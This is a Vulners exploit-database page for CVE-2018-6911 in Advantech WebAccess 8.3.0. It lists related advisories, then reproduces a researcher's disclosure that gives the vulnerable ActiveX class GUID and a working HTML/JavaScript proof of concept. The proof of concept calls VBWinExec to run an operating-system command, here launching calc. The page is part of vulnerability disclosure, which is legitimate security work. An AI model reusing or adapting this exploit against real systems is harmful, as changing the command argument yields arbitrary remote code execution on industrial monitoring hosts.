Vulners
Lucene search
Advantech WebAccess 8.3.0 - Remote Code Execution Exploit
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | The vulnerability of the VBWinExec function in the software for remote monitoring of Advantech WebAccess allows a hacker to execute arbitrary commands on the operating system. | 3 May 201800:00 | – | bdu_fstec |
 | CVE-2018-6911 | 13 Feb 201814:00 | – | cve |
 | CVE-2018-6911 | 13 Feb 201814:00 | – | cvelist |
 | Advantech WebAccess 8.3.0 - Remote Code Execution | 13 Feb 201800:00 | – | exploitdb |
 | Advantech WebAccess 8.3.0 - Remote Code Execution | 13 Feb 201800:00 | – | exploitpack |
 | CVE-2018-6911 | 13 Feb 201814:29 | – | nvd |
 | Advantech WebAccess Node 8.3.0 DLL Hijacking | 12 Feb 201800:00 | – | packetstorm |
 | Command injection | 13 Feb 201814:29 | – | prion |
Vulnerability Title: Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution
Discovered by: Nassim Asrir
Contact: [email protected] / https://www.linkedin.com/in/nassim-asrir-b73a57122/
CVE: CVE-2018-6911
Tested on: IE11 / Win10
Technical Details:
==================
The VBWinExec function in Node\AspVBObj.dll in Advantech WebAccess 8.3.0 allows remote attackers to execute arbitrary OS commands via a single argument.
Vulnerable File: C:\WebAccess\Node\AspVBObj.dll
Vulnerable Function: VBWinExec
Vulnerable Class: Include
Class Include
GUID: {55F52D11-CEA5-4D6C-9912-2C8FA03275CE}
Number of Interfaces: 1
Default Interface: _Include
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
The VBWinExec function take one parameter and the user/attacker will be able to control it to execute OS command.
Function VBWinExec (
ByRef command As String
)
Exploit:
========
<title>Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution</title>
<BODY>
<object id=rce classid="clsid:{55F52D11-CEA5-4D6C-9912-2C8FA03275CE}"></object>
<SCRIPT>
function exploit()
{
rce.VBWinExec("calc")
}
</SCRIPT>
<input language=JavaScript onclick=exploit() type=button value="Exploit-Me"><br>
</body>
</HTML>
# 0day.today [2018-03-02] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Feb 2018 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.29181